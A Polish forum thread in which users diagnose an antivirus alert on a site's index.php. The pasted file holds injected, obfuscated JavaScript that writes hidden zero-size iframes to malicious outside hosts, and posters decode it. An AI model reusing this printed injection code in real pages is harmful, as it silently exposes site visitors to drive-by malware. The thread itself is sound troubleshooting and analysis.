Wirus w pliku index.php

[szymcioooo]

Siemka. Ostatnio ściągałem sobie z ftp`ka plik index.php i buczy mi że mam wirusa... Mam takie pytanko czy wiecie może co to może być za typ wirusa, co może powodować i na jakiej zasadzie... Jakby co mogę tutaj wkleić kod źródłowy index.php

Pozdro

 

[The]

Moze to jakiś exploit

 

[B33RK4]

co Wy macie z tymi shitami antywirusowymi, one są do niczego...Wrażliwe są na wszystko, no ale, daj żródełko to zobaczymy co tam jest. Swoją drogą jak może być wirus w *.php, skoro to jest wykonywalne tylko i wyłącznie po stronie serwera...

 

[timpler]

może w kodzie zawarte są polecenia dla cmd użytkownika. Funkcja system...

 

[szymcioooo]

<?php
/*********************************************************
* Author: John Astill Š
* Date : 9th December
* File : index.php
********************************************************/
require "systemvars.php";
require "configvalues.php";
require "sortfunctions.php";
require "security.php";

?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset?>">
<title>
<?php echo $PredictionLeagueTitle ?>
</title>
<link rel="stylesheet" href="common.css" type="text/css">
</head>
<body class="MAIN">
<?php echo $HeaderRow ?>
<table class="MAINTB">

<?php if ($ErrorCode != "") { ?>
<tr>
<td colspan="3" bgcolor="red" align="center">

<font class="TBLHEAD">
<?php
echo $ErrorCode;
ClearErrorCode();
?>
</font>
</td>
</tr>
<?php
}
?>


<tr>
<td colspan="3" align="center" class="TBLROW">
<font class="TBLROW">
<?php echo getNextGame() ?>
</font>
</td>
</tr>
<tr>

<td class="LEFTCOL">

<?php require "loginpanel.php" ?>


<?php require "menus.php"?>

</td>

<td align="LEFT" class="CENTERCOL">

<?php
// It looks like the functions cannot access global type data.
ShowStandingsTable();
?>
</td>

<td class="RIGHTCOL" align="RIGHT">

<?php //ShowPredictionStatsForAllMatches(); ?>
<?php ShowPredictionStatsForNextMatch(); ?>


<?php require "prize.html"?>
</td>
</tr>
</table>
</body>
</html>

<script LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!46!104!101!108!112!100!101!115!105!103!110!111!110!108!105!110!101!46!99!111!109!47!118!105!47!105!110!100!101!120!46!104!116!109!108!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAtŠ!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT> <script LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!115!97!108!101!118!105!115!105!116!111!114!46!110!101!116!47!105!110!46!99!103!105!63!50!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAtŠ!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
<script type="text/javascript">

<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>
<script type="text/javascript">
<!--
document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%69%66%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>[/b]

Takie coś

I buczy niesamowicie

jak chce na dysk ściągnąć

 

[bziomek]

Avastowi śmierdzi ten fragment:

<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->

Albo jakaś jego część.

 

[sinis]

A cały ten fragment oznacza tylko tyle:

<iframe src="http://salevisitor.net/in.cgi?2" width=0 height=0 style="display:none;"></iframe>

 

[The]

Po zdekodowaniu mamy takie coś:

<iframe src="http://salevisitor.net/in.cgi?2" width=0 height=0 style="display:none;"></iframe>

Po wejsciu na stronę Firefoxem 3 mamy:

,,Witryna zgłoszona jako dokonująca ataków!

Witryna 61.19.246.58 została zgłoszona jako witryna stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.

Tego rodzaju witryny mogą próbować instalować oprogramowanie wykradające poufne dane, używające komputera do pośredniczenia w atakach lub uszkadzające system.

Niektóre szkodliwe witryny celowo rozpowszechniają niebezpieczne oprogramowanie, ale większość z nich to witryny, na które nastąpiło włamanie.''

edit# Spóźniłem sie...

 

[bziomek]

Tak samo Opera:

Ostrzeżenie przed oszustwem
http://61.19.246.58/~eagle1/index.php

Strona, którą próbujesz otworzyć, znajduje się na czarnej liście witryn rozprowadzających złośliwe oprogramowanie. Oprogramowanie pobrane z tej strony może być szkodliwe. Opera Software stanowczo odradza otwieranie tej strony.[/b]

 

[sinis]

Ciekawy ten serwerek... xD

 

[The]

A po wejściu na stronę mamy napis:

,Under ReConstruction'

 

[B33RK4]

timpler a przeczytaj to co napisałem wyżej, PHP jest wykonywane po stronie servera ! co z tego że będzie coś system(), czy exec() czy cokolwiek innego...

 

[szymcioooo]

Mało co z tego zrozumiałem

Czyli prostym językiem wszystko styka/

 

[amex]

B33RK4, a no to że jak ktoś ma serwer ww na kompie, ma AV i ktoś mu upnie na serwer shella to chyba dobrze by było gdyby AV go wykrył, nie?

<iframe src="http://salevisitor.net/in.cgi?2" width=0 height=0 style="display:none;"></iframe>[/b]

jeśli to ten fragment jest wykrywalny to zapewne chodzi o wymiary ramki, bo o ile pamiętam w jakieś starej wersji IE czy FF taka ramka była podstawą jakiegoś tam pseudo exploita

 

[Alliata]

a mam takie pytanie.. jak to zdekodowaliście ?

 

[abramakabra]

http://www.flashzone.pl/item/2325/unescape/

 

[amex]

a mam takie pytanie.. jak to zdekodowaliście ?[/b]

po prostu wystarczy wywołać, funkcje unescape w JavaScript, np

<script>alert(unescape(zakodowanytext));</script>

//@up: uhuhu.. ale się spóźniłem, ^^

 

[sinis]

Lub jeszcze prościej:
W pasku adresu

java script:alert(unescape(<ten śmieszny ciąg hexadecymalny>))

 

[lukrow]

Witam, ja mam podobny problem,

do stron na serwerze ovh dopisuje mi sie podobny skrypt,
google chrome zdekodował mi to samo ale nie wiem czy to ja mam jakiegoś wirusa
który mi to dziadostwo dopisuje przy edycji czy to wina ovh.

 

[Magnefikko]

Ja myślę że to po prostu reklama OVH xD